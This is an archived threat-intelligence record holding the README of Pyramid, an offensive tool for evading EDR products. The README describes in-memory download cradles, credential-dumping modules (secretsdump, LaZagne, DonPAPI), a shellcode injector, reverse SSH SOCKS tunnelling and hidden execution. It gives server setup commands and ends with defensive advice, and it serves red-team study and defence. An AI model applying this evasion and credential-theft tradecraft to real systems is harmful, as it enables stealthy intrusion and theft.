{
	"id": "9aed8c3e-df34-4f7b-adcf-46564267ab7c",
	"created_at": "2026-04-06T01:30:51.946231Z",
	"updated_at": "2026-04-10T13:12:03.743037Z",
	"deleted_at": null,
	"sha1_hash": "2151e10d42d8cd95b9d0c927db004d394160aad6",
	"title": "GitHub - naksyn/Pyramid: a tool to help operate in EDRs' blind spots",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1781804,
	"plain_text": "GitHub - naksyn/Pyramid: a tool to help operate in EDRs' blind\r\nspots\r\nBy naksyn\r\nArchived: 2026-04-06 00:46:34 UTC\r\nppyytthhoonn 3 . 7 +\r\n NNaakkssyynn\r\nWhat is it\r\nPyramid is composed of:\r\n1. a Python HTTP/S server that can deliver encrypted files (chacha, xor)\r\n2. Python modules that can load in-memory dependencies of offensive tooling such as Bloodhound-py,\r\nsecretsdump, LaZagne, Pythonnet, DonPAPI, pythonmemorymodule, paramiko, pproxy.\r\n3. fixed Python dependencies (zip files) that can be imported in memory\r\n4. Python cradle that can download, decrypt and execute in memory Pyramid modules\r\nWhy is it useful\r\nPyramid is useful to perform post-exploitation task in an evasive manner, executing offensive tooling from a\r\nsigned binary (e.g. python.exe) by importing their dependencies in memory. This can be achieved because:\r\n1. the Python Embeddable package provides a signed Python interpreter with good reputation;\r\n2. Python has many legit applications, so there is a lot of different telemetry coming from the python.exe\r\nbinary since the interpreter natively runs the APIs. This can be abused by operating within the Python.exe\r\nprocess and trying to blend in the huge \"telemetry fingerprint\" of python.exe binary.\r\n3. There is a lack of auditing for Python code execution - PEP-578 tried to solve that but the stock python.exe\r\nbinary does not have auditing capabilities enabled by default.\r\nhttps://github.com/naksyn/Pyramid\r\nPage 1 of 5\n\n4. Operations can be done natively from within python.exe natively using Python language to perform post\r\nexploitation tasks such as dynamically importing Python modules to run offensive tools and executing\r\nBeacon Object Files (after some BOF modifications) directly within python.exe.\r\nFor more information please check the DEFCON30 - Adversary village talk \"Python vs Modern Defenses\"\r\nslide deck and this post on my blog.\r\nDisclaimer\r\nThis tool was created to demostrate a bypass strategy against EDRs based on some blind-spots assumptions. It is a\r\ncombination of already existing techniques and tools in a (to the best of my knowledge) novel way that can help\r\nevade defenses. The sole intent of the tool is to help the community increasing awareness around this kind of\r\nusage and accelerate a resolution. It's not a 0day, it's not a full fledged shiny C2, Pyramid exploits what might be\r\nEDRs blind spots and the tool has been made public to shed some light on them. A defense paragraph has been\r\nincluded, hoping that experienced blue-teamers can help contribute and provide better possible resolution on the\r\nissue Pyramid aims to highlight. All information is provided for educational purposes only. Follow instructions at\r\nyour own risk. Neither the author nor his employer are responsible for any direct or consequential damage or loss\r\narising from any person or organization.\r\nCredits\r\nPyramid's in-memory loading was initially inspired and expanded upon xorrior 's Empyre - Finder Class\r\nContributors\r\nsnovvcrash built the modules mod-DonPAPI.py - mod-LaZagne.py - mod-clr.py\r\nCurrent features\r\nPyramid modules capabilities can be executed directly from a Python interpreter and are currently:\r\n1. Downloading, decryption and in-memory loading of Python dependencies.\r\n2. Dynamic loading and execution of BloodHound Python, impacket secretsdump, DonPAPI, LaZagne.\r\n3. In-memory loading of a remotely fetched dll or exe via PythonMemoryModule\r\n4. SOCKS5 proxying through SSH reverse port forward tunnel.\r\n5. In-memory .NET assembly loading via Pythonnet\r\nPyramid HTTP server main features:\r\n1. on-the-fly encryption (chacha,xor) of files to be delivered\r\n2. auto-generation of Server configs based on pyramid command line\r\n3. decoding and decryption of HTTP parameters (URL)\r\n4. Basic HTTP Authentication\r\nCradle main features:\r\nhttps://github.com/naksyn/Pyramid\r\nPage 2 of 5\n\n1. Downloading, decryption and in-memory execution of Pyramid modules.\r\n2. Python-standard-libraries-only dependancy\r\nDescription\r\nPyramid can be used with a Python Interpreter already existing on a target machine, or unpacking an official\r\nembeddable Python package and then running python.exe to execute a Python download cradle. This is a simple\r\nway to avoid creating uncommon Process tree pattern and looking like a normal Python application usage.\r\nIn Pyramid the download cradle is used to reach a Pyramid Server via HTTP/S to fetch modules and\r\ndependencies.\r\nModules are specific for the feature you want to use and contain:\r\n1. Custom Finder class to in-memory import required dependencies (zip files).\r\n2. Code to download the required dependencies.\r\n3. Main logic for the program you want to execute (bloodhound, secretsdump, paramiko etc.).\r\nThe Python dependencies have been already fixed and modified to be imported in memory without conflicting.\r\nThere are currently 8 Pyramid modules available:\r\n1. bh.py will in-memory import and execute python-BloodHound.\r\n2. secretsdump.py will in-memory import and execute Impacket secretsdump.\r\n3. shellcode.py is a simple in-memory shellcode injector.\r\n4. DonPAPI.py script will in-memory import and execute DonPAPI. Results and credentials extracted are\r\nsaved on disk in the Python Embeddable Package Directory.\r\n5. LaZagne.py script will in-memory import and execute LaZagne\r\n6. tunnel-socks5 script import and executes paramiko on a new Thread to create an SSH remote port forward\r\nto an SSH server, then a socks5 proxy server is executed locally on target and made accessible remotely\r\nthrough the SSH tunnel.\r\n7. clr script imports Pythonnet to load and execute a .NET assembly in-memory.\r\n8. pythonmemorymodule script import PythonMemoryModule to load a dll from memory.\r\nUsage\r\nStarting the server\r\ngit clone https://github.com/naksyn/Pyramid\r\nGenerate SSL certificates for HTTP Server:\r\nopenssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365\r\nIf you want to use your own signed SSL certificate be sure to:\r\n1. use pem format\r\nhttps://github.com/naksyn/Pyramid\r\nPage 3 of 5\n\n2. rename the files with key.pem and cert.pem\r\n3. place both files into the Server folder.\r\nConfiguring the module\r\nAs an example, if you want to use pythonmemorymodule with Pyramid, put your payload in the Delivery_files\r\nfolder, then open pythonmemorymodule.py and configure the needed parameters in the top of the script, such as\r\nthe name of the payload file and the procedure you want to call after the PE has been loaded.\r\nUnzip embeddable package and execute the download cradle on target\r\nOnce the Pyramid server is running and the Base script is ready you can set the variable pyramid_module in\r\nAgent/cradle.py file and execute it on the target. The cradle is built to be run with python standard libraries.\r\nExample\r\nExample of running Pyramid HTTP Server using SSL certificate providing Basic Authentication, encrypting\r\ndelivery files using ChaCha and auto-generating server configuration in modules and printing a pastable cradle for\r\npythonmemorymodule:\r\npython3 pyramid.py -p 443 -ssl -u testuser -pass Sup3rP4ss! -enc \"chacha20\" -passenc \"TestPass1\" -se\r\nUpon startup pyramid.py will parse its own folder structure to look for key.pem, cert.pem and will deliver files\r\nfrom Server folder.\r\nPyMM.mp4\r\nTip for executing Pyramid without visible prompt\r\nTo execute Pyramid without bringing up a visible python.exe prompt you can leverage pythonw.exe that won't\r\nopen a console window upon execution and is contained in the very same Windows Embeddable Package. The\r\nfollowing picture illustrate an example usage of pythonw.exe to execute base-tunnel-socks5.py on a remote\r\nmachine without opening a python.exe console window.\r\n0:00\r\nhttps://github.com/naksyn/Pyramid\r\nPage 4 of 5\n\nLimitations\r\nDynamically loading Python modules does not natively support importing *.pyd files that are essentially dlls. The\r\nonly public solution to my knowledge that solves this problem is provided by Scythe *(in-memory-execution) by\r\nre-engineering the CPython interpreter. In ordrer not to lose the digital signature, one solution that would allow\r\nusing the native Python embeddable package involves dropping on disk the required pyd files or wheels. This\r\nshould not have significant OPSEC implications in most cases, however bear in mind that the following wheels\r\ncontaining pyd files are dropped on disk to allow Dinamic loading to complete: *. Cryptodome - needed by\r\nBloodhound-Python, Impacket, DonPAPI and LaZagne *. bcrypt, cryptography, nacl, cffi - needed by paramiko\r\nHow to defend from this technique\r\nPython.exe is a signed binary with good reputation and does not provide visibility on Python dynamic code.\r\nPyramid exploits these evasion properties carrying out offensive tasks from within the same python.exe process.\r\nFor this reason, one of the most efficient solution would be to block by default binaries and dlls signed by Python\r\nFoundation, creating exceptions only for users that actually need to use python binaries.\r\nAlerts on downloads of embeddable packages can also be raised.\r\nDeploying PEP-578 is also feasible although complex, this is a sample implementation. However, deploying PEP-578 without blocking the usage of stock python binaries could make this countermeasure useless.\r\nSource: https://github.com/naksyn/Pyramid\r\nhttps://github.com/naksyn/Pyramid\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://github.com/naksyn/Pyramid"
	],
	"report_names": [
		"Pyramid"
	],
	"threat_actors": [],
	"ts_created_at": 1775439051,
	"ts_updated_at": 1775826723,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2151e10d42d8cd95b9d0c927db004d394160aad6.pdf",
		"text": "https://archive.orkl.eu/2151e10d42d8cd95b9d0c927db004d394160aad6.txt",
		"img": "https://archive.orkl.eu/2151e10d42d8cd95b9d0c927db004d394160aad6.jpg"
	}
}